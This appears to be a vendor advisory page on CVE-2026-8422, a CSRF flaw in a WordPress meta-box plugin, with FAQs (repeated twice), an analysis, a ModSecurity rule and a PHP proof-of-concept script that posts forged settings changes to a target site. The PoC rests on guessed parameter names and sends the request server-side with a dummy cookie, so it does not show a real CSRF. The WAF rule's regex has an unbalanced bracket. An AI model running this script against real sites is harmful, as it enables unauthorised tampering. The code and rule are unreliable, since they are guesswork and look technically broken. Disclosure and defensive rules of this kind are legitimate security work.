What is CVE-2026-8422?

CVE-2026-8422 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the Remove Meta Boxes per User Role plugin for WordPress, specifically in versions up to and including 1.01. It allows unauthenticated attackers to modify plugin settings by tricking an administrator into clicking a malicious link.

How does this vulnerability work?

The vulnerability arises from missing or incorrect nonce validation on the plugin’s settings page. An attacker can craft a malicious request that modifies the visibility settings of meta boxes for different user roles, executing the request with the privileges of a logged-in administrator.

Who is affected by CVE-2026-8422?

Any WordPress site using the Remove Meta Boxes per User Role plugin version 1.01 or earlier is affected. Administrators should check their installed plugins for this specific version to determine if they are at risk.

How can I check if I am using a vulnerable version?

To check if you are using a vulnerable version, log in to your WordPress admin panel, navigate to the Plugins section, and locate the Remove Meta Boxes per User Role plugin. The version number will be listed next to the plugin name.

What should I do if I am affected?

If you are using a vulnerable version of the plugin, it is recommended to disable the plugin immediately to prevent exploitation. Additionally, monitor your site for any unauthorized changes.

How can the vulnerability be mitigated?

Mitigation involves disabling the Remove Meta Boxes per User Role plugin until a patched version is released. Administrators should also educate users about the risks of clicking on unknown links.

What does the CVSS score of 4.3 indicate?

The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability poses a risk, it does not lead to a complete compromise of the system. The impact is primarily on the integrity of the plugin settings.

What is nonce validation and why is it important?

Nonce validation is a security measure in WordPress that helps prevent CSRF attacks by ensuring that requests originate from legitimate sources. It is crucial for protecting sensitive actions in the WordPress admin interface.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the CSRF vulnerability by crafting a malicious request that alters plugin settings. It shows the parameters that would be used in such a request, emphasizing the lack of nonce verification.

What are the potential consequences of this vulnerability?

The primary consequence of this vulnerability is unauthorized modification of meta box visibility settings, which could disrupt administrative workflows or hide important features from users. However, it does not lead to data breaches or privilege escalation.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the Remove Meta Boxes per User Role plugin available. Site administrators should remain vigilant and check for updates from the plugin developer.

How can I stay informed about vulnerabilities like CVE-2026-8422?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database for updates related to WordPress plugins and themes.

Published : June 22, 2026

CVE-2026-8422: Remove meta boxes per user role <= 1.01 Cross-Site Request Forgery to Settings Update PoC, Patch Analysis & Rule

CVE ID CVE-2026-8422

Plugin remove-meta-boxes-per-user-role

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.01

Patched Version —

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8422 (metadata-based): This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Remove Meta Boxes per User Role plugin for WordPress, affecting versions up to and including 1.01. It allows an unauthenticated attacker to modify or reset the plugin’s per-role meta box visibility settings by tricking a site administrator into clicking a malicious link.

The root cause is missing or incorrect nonce validation on the plugin’s settings page, likely in the callback function that processes form submissions on the ‘remove-meta-boxes-per-user-role’ admin page. In WordPress admin, nonce verification (via check_admin_referer() or wp_verify_nonce()) prevents CSRF attacks by ensuring the request originated from the legitimate admin interface. The description explicitly states missing nonce validation, which Atomic Edge analysis confirms based on the CWE-352 classification and the provided CVE description. No code diff is available, so the exact missing nonce check is inferred rather than confirmed.

To exploit this vulnerability, an attacker crafts a malicious HTML form or link that automatically submits a POST request to the WordPress admin URL for the plugin’s settings page (likely /wp-admin/options-general.php?page=remove-meta-boxes-per-user-role or similar). The forged request contains parameters that change the plugin’s settings (e.g., disabling meta boxes for specific user roles or resetting all settings). The attacker then lures a logged-in administrator to click the link or visit a page with the auto-submitting form. The request will execute with the administrator’s privileges, modifying the plugin configuration without their consent.

Remediation requires the plugin developer to add proper nonce validation on the settings page form submission handler. Specifically, they must generate a nonce with wp_nonce_field() in the form and then verify it using check_admin_referer() or wp_verify_nonce() at the start of the processing function. Since no patched version exists, site administrators should disable the plugin immediately.

The impact is limited to unauthorized modification of the plugin’s per-role meta box visibility settings. An attacker could hide or show meta boxes (like the post custom fields or excerpt boxes) for specific user roles, potentially disrupting administrative workflows or hiding security-relevant meta boxes. The CVSS score is 4.3 (medium), indicating low confidentiality and integrity impact with no availability impact. No direct data breach or privilege escalation is possible.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-8422 (metadata-based)
# Block CSRF exploitation attempts targeting the Remove Meta Boxes per User Role settings page.
# This rule matches POST requests to the plugin settings page without a valid nonce (assumed missing).
# The rule is chained to first match the exact admin page path, then check for POST data that indicates settings modification.

SecRule REQUEST_METHOD "@streq POST" 
  "id:20268422,phase:2,deny,status:403,msg:'CVE-2026-8422 - CSRF attempt on Remove Meta Boxes settings',severity:'CRITICAL',tag:'CVE-2026-8422',chain"
  SecRule REQUEST_URI "@rx /wp-admin/options-general.php$" "chain"
    SecRule QUERY_STRING "@contains page=remove-meta-boxes-per-user-role" "chain"
      SecRule ARGS_POST "@rx (rmbpur_settings|rmbpur_reset|meta_boxes[)" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8422 - Remove meta boxes per user role <= 1.01 - Cross-Site Request Forgery to Settings Update

/**
 * Proof of Concept: Exploit CSRF in Remove Meta Boxes per User Role plugin.
 * This script forges a request to modify the plugin's settings.
 * Assumptions:
 * - The plugin settings page is at /wp-admin/options-general.php?page=remove-meta-boxes-per-user-role
 * - The form submission updates per-role meta box visibility via POST parameters like 'role_administrator_meta_boxes' or similar.
 * - No nonce verification is performed on the settings update handler.
 */

// Target WordPress installation URL
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

// WordPress admin URL for the plugin settings page
$settings_url = $target_url . '/wp-admin/options-general.php?page=remove-meta-boxes-per-user-role';

// Construct a malicious POST request to modify settings.
// The exact parameter names are unknown without code access, so we use plausible examples.
// Common patterns: array of meta box IDs for each role, or a 'reset' flag.
$post_data = array(
    'rmbpur_settings' => '1',
    'rmbpur_reset'    => '1',           // Attempt to reset all settings
    // Alternative: toggle visibility for specific roles and meta boxes
    'meta_boxes[administrator]' => array('postcustom', 'commentstatus'), // Hide some boxes for admins
    'meta_boxes[editor]'        => array(),
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check'); // Assumes admin has valid session cookies
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the request succeeded (admin page returns 200 OK)
if ($http_code == 200) {
    echo "[+] Request completed with HTTP $http_code. Settings may have been updated.n";
} else {
    echo "[-] Request failed with HTTP $http_code.n";
}
?>

Frequently Asked Questions

What is CVE-2026-8422?
Overview of the vulnerability
CVE-2026-8422 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the Remove Meta Boxes per User Role plugin for WordPress, specifically in versions up to and including 1.01. It allows unauthenticated attackers to modify plugin settings by tricking an administrator into clicking a malicious link.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing or incorrect nonce validation on the plugin’s settings page. An attacker can craft a malicious request that modifies the visibility settings of meta boxes for different user roles, executing the request with the privileges of a logged-in administrator.
Who is affected by CVE-2026-8422?
Identifying vulnerable installations
Any WordPress site using the Remove Meta Boxes per User Role plugin version 1.01 or earlier is affected. Administrators should check their installed plugins for this specific version to determine if they are at risk.
How can I check if I am using a vulnerable version?
Steps to verify plugin version
To check if you are using a vulnerable version, log in to your WordPress admin panel, navigate to the Plugins section, and locate the Remove Meta Boxes per User Role plugin. The version number will be listed next to the plugin name.
What should I do if I am affected?
Immediate actions to take
If you are using a vulnerable version of the plugin, it is recommended to disable the plugin immediately to prevent exploitation. Additionally, monitor your site for any unauthorized changes.
How can the vulnerability be mitigated?
Recommendations for site administrators
Mitigation involves disabling the Remove Meta Boxes per User Role plugin until a patched version is released. Administrators should also educate users about the risks of clicking on unknown links.
What does the CVSS score of 4.3 indicate?
Understanding the severity level
The CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability poses a risk, it does not lead to a complete compromise of the system. The impact is primarily on the integrity of the plugin settings.
What is nonce validation and why is it important?
Role of nonce in WordPress security
Nonce validation is a security measure in WordPress that helps prevent CSRF attacks by ensuring that requests originate from legitimate sources. It is crucial for protecting sensitive actions in the WordPress admin interface.
What does the proof of concept demonstrate?
Explaining the exploit example
The proof of concept illustrates how an attacker can exploit the CSRF vulnerability by crafting a malicious request that alters plugin settings. It shows the parameters that would be used in such a request, emphasizing the lack of nonce verification.
What are the potential consequences of this vulnerability?
Impact on site functionality
The primary consequence of this vulnerability is unauthorized modification of meta box visibility settings, which could disrupt administrative workflows or hide important features from users. However, it does not lead to data breaches or privilege escalation.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version of the Remove Meta Boxes per User Role plugin available. Site administrators should remain vigilant and check for updates from the plugin developer.
How can I stay informed about vulnerabilities like CVE-2026-8422?
Resources for security updates
To stay informed about vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database for updates related to WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations